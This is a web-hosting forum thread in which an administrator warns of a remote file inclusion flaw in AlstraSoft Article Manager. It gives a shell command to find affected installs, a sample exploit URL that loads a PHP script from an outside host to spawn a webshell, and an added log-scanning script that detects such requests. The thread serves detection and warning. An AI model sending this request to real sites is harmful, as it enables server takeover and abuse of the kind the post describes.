Nasty AlstraSoft Article Manager Exploit Found

LiNUxG0d

Hey all,

If a user is using AlstraSoft Article Manager, there is currently an exploit which allows the script to INCLUDE any URL on the net. If the URL points to a TEXT version of a PHP script, it will execute it IN the body of the Article Site Manager thus spawning a PHP webshell.

If you suspect someone is running this, search for these common files in a Linux shell as root or a sudoer:

find /home -name "mostpopulararticles.php"

If you find this, please be wary. I've already proven it on two of my dedicated server owners and man, it's nasty. The script kiddies used it and uploaded 4.5 GIGs of DVD RIPs.

The proof in the pudding:

http://infectedarticlesite.com/?page=http://somedomain.com/file.txt

Mods, I hope this is appropriate; we don't have a security section and really, I think everyone should know this exploit exists since my server got hit and our main pipe was crippled with 90Mbit of UDP ping traffic (UDP flood through IRC, planted by the webshell).

Don't get caught with your pants down folks, stay alert!

Jamie
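
As a follow-up to the `find` check in the post above, this added example (not part of the original post) lists access-log requests whose `page` parameter carries a remote URL, the request shape the post quotes. It assumes Apache common/combined log format; the function names and the sample log lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the thread): list access-log requests whose "page"
# parameter carries a remote URL, the request shape quoted in the first post.
# Assumptions: Apache common/combined log format (client in field 1, request
# path in field 7); function names and sample data are constructed here.

# find_rfi_requests [LOGFILE...]  (reads stdin when no file is given)
# Prints "client<TAB>request" for each hit. Only the request field is tested,
# so a matching Referer does not trigger. Catches plain and percent-encoded
# schemes in any letter case.
find_rfi_requests() {
    awk '
        { req = tolower($7) }
        req ~ /[?&]page=(https?|ftps?)(:|%3a)(\/|%2f)(\/|%2f)/ { print $1 "\t" $7 }
    ' "$@"
}

# count_rfi_sources [LOGFILE...]
# Hits per client address, busiest first.
count_rfi_sources() {
    find_rfi_requests "$@" | cut -f1 | sort | uniq -c | sort -rn
}

# Constructed sample log lines using documentation address ranges.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /?page=http://somedomain.com/file.txt HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2006:10:00:05 +0000] "GET /index.php?id=3&page=HTTP%3A%2F%2Fsomedomain.com%2Ffile.txt HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2006:10:01:00 +0000] "GET /?page=contact HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2006:10:02:00 +0000] "GET /index.php?page=ftp://somedomain.com/file.txt HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2006:10:03:00 +0000] "GET /articles.php?ref=http://example.org/ HTTP/1.1" 200 2048
EOF
}

# Scan the logs named on the command line, or the sample when none are given.
if [ "$#" -gt 0 ]; then
    count_rfi_sources "$@"
else
    sample_log | find_rfi_requests
fi
```

Pass the site's access logs as arguments to get a per-client count; a hit shows that the request was made, not that the include succeeded.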
 

chirpy

It isn't really appropriate to these forums unless it is for a script that's provided by cPanel. There are exploits published for all sorts of script applications daily. If people want to keep up with them they should subscribe to the likes of Bugtraq.
 

LiNUxG0d

Ok Jonathan,

Just wanted to provide a heads up for preventative purposes.

My apologies, sometimes I get overly concerned with others' security. ;) I'll stick to mine.

Hehehehe,

Jamie
 